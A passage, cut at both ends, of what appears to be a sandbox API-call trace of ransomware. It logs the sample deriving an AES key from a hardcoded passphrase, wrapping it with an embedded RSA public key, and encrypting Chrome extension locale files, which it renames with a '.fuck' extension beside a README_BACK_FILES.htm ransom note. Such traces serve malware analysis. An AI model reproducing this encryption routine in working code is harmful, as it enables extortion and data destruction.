Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.710] GetFileType (hFile=0x5d64) returned 0x1 [0259.710] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.712] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.712] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.712] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.712] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.712] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.712] GetLastError () returned 0x0 [0259.712] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json")) returned 0x20 [0259.712] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0259.713] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.714] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.715] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.716] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.717] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.717] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.717] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.717] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.718] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.718] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.718] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d4c0) returned 1 [0259.718] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d4c0, dwCertEncodingType=0x1, pInfo=0x2e28430*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28460*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28468*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cbc0) returned 1 [0259.718] CryptEncrypt (in: hKey=0x2e7cbc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.718] CryptEncrypt (in: hKey=0x2e7cbc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d878*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d878*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.718] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6d878*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d878*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.719] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x29f, lpOverlapped=0x0) returned 1 [0259.721] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x29f, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0259.721] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0259.722] CloseHandle (hObject=0x5d60) returned 1 [0259.722] CloseHandle (hObject=0x5d5c) returned 1 [0259.722] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), bFailIfExists=0) returned 1 [0259.724] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json", dwFileAttributes=0x0) returned 1 [0259.725] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.gsg")) returned 1 [0259.726] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json.fuck")) returned 1 [0259.727] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.727] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.727] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.727] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.727] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.727] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\readme_back_files.htm")) returned 0xffffffff [0259.727] AreFileApisANSI () returned 1 [0259.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.727] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.730] GetFileType (hFile=0x5d64) returned 0x1 [0259.730] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.731] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.731] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.732] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.732] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.732] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.732] GetLastError () returned 0x0 [0259.732] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json")) returned 0x20 [0259.733] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0259.733] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.734] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.735] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.735] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.737] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.737] lstrlenA (lpString="LuXDCLUdgJNWeAQwlsAtPshtzMlQm") returned 29 [0259.737] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.737] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.737] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.737] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.737] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6e290) returned 1 [0259.738] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6e290, dwCertEncodingType=0x1, pInfo=0x2e28500*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e28530*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e28538*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c9c0) returned 1 [0259.738] CryptEncrypt (in: hKey=0x2e7c9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.738] CryptEncrypt (in: hKey=0x2e7c9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d548*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d548*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.738] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6d548*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d548*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.739] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x282, lpOverlapped=0x0) returned 1 [0259.741] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x282, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x290) returned 1 [0259.741] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x290, lpOverlapped=0x0) returned 1 [0259.742] CloseHandle (hObject=0x5d5c) returned 1 [0259.742] CloseHandle (hObject=0x5d60) returned 1 [0259.742] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0259.748] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0259.749] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0259.750] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0259.751] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.751] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.751] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.751] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.751] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.751] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0259.751] AreFileApisANSI () returned 1 [0259.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.751] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.752] GetFileType (hFile=0x5d64) returned 0x1 [0259.752] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.753] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.753] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.753] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.753] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.753] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.753] GetLastError () returned 0x0 [0259.753] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json")) returned 0x20 [0259.754] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0259.754] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.755] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 